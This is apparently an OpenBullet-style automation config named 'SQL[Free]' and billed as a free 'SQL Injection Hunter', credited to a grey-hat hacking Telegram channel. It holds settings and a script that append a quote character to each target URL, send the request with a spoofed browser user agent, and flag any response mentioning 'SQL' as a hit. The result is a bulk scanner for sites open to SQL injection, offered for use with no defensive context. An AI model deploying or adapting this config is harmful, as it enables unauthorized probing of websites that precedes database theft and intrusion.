[SETTINGS]
{
  "Name": "SQL[Free]",
  "SuggestedBots": 3,
  "MaxCPM": 0,
  "LastModified": "2022-10-11T20:34:09.5329427+01:00",
  "AdditionalInfo": "SQL Injection Hunter Free !*_*! https://t.me/GreyH4tHackers",
  "RequiredPlugins": [],
  "Author": "l4gtr4",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": true,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "<URL>'__" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "SQL" 
    KEY "<SOURCE>" DoesNotContain "Sql" 
  KEYCHAIN Success OR 
    KEY "SQL" 
    KEY "Sql" 
  KEYCHAIN Retry OR 
    KEY "Unable to connect to the" 

